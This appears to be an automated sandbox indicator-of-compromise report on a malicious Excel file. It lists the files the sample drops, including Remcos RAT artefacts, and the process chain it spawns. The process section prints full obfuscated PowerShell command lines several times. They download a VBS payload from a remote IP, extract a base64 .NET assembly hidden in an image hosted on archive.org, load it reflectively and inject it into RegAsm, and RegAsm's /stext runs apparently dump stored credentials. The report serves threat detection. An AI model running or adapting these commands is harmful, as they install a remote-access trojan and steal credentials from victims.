IOC Report
QPS-36477.xls

loading gif

Files

File Path
Type
Category
Malicious
QPS-36477.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 08:27:12 2024, Security: 1
initial sample
 malicious
C:\ProgramData\remcos\logs.dat
data
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newthingtobeonlinefor[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
modified
 malicious
C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\Users\user\Desktop\QPS-36477.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 14:23:56 2024, Security: 1
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\verybestthingswesharedfornew[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\124D361A.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5044CFE0.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\513B20EE.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7607AB2C.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CB31CE61.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E65D8017.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\2saljapr.gmj.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\2znmg1t3.ibd.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\35bqgywr.qx3.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\4q1xhq04.kp1.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RES3ED5.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 8 13:23:47 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RES87A7.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 8 13:24:06 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\appvxtgv.lsd.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\bhv8392.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x129d030b, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\ejnsb2ny.u3c.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\htl32eqc.mge.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\jfaasddkn
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\lkzgbmkm\CSCA61F80875D1340AC807DD81469F56ED.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (366)
dropped
C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\n1ccr2y2.akp.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\utntlsat.iha.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\uvrrkyhh\CSC53416C506E684743ABB03B3747B68267.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (366)
dropped
C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\vyubxzps.w4d.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\yd20fzhg.x0b.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\zw52xona.xi3.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF6DB3E13BAF41239C.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF956B7095E76C06D2.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF9D547381441752C0.TMP
data
dropped
C:\Users\user\Desktop\58430000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 14:23:56 2024, Security: 1
dropped
C:\Users\user\Desktop\58430000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 36 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
 malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn"
 malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lzfstnomboxo"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wcklufzfxwpbazt"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
